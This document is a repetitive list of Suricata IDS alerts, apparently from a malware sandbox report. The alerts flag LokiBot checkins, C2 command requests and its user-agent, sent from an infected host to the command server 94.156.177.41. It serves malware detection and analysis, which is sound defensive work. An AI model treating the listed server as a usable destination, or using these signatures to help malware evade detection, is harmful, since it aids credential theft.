              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49953 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49974 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49974 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49974 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49711 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49974 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49974 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49953 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49993 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49993 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49993 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49968 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49968 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49869 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49869 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49869 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49869 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49869 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49945 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49945 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49945 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49945 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49945 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49993 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49993 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49722 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49722 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49722 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50002 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50002 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50002 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49722 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49722 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50002 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50002 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50016 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50016 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50016 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50044 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50044 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50044 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50044 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50044 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49891 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49891 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49891 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49891 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49891 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50016 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50016 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49980 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49980 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49980 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49980 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49980 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50055 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50055 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50046 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50046 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50050 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50046 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50055 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50056 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50050 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50046 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50055 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50043 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50043 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50066 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50066 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50046 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50063 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50063 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50063 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50063 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49811 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49811 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49811 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50058 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50058 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50058 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49811 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49811 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50058 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50058 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50050 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50055 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50079 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50079 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50079 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50063 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50078 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50078 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50078 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50079 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50079 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50078 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50078 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50059 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50059 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50059 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50059 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50066 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50081 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50081 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50081 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50081 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50081 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50082 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50082 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50082 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50066 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50056 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50056 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50049 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50049 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50049 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49928 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49928 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49928 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50082 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50082 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50049 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50049 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50050 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50050 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50056 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50059 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50056 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50072 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50072 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50072 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50101 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50101 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49928 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49928 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50096 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50096 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50096 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50010 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50010 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50010 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50096 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50096 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50010 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50010 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50111 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50111 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50111 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50111 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50111 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50101 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50064 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50064 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50064 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50101 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50101 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50064 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50064 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50066 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50072 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50072 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49715 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49715 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49715 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50048 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50048 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50048 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50048 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50048 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50105 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50105 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50105 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50105 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50105 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50061 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50061 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50061 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50061 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50061 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50093 -> 94.156.177.41:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50093 -> 94.156.177.41:80
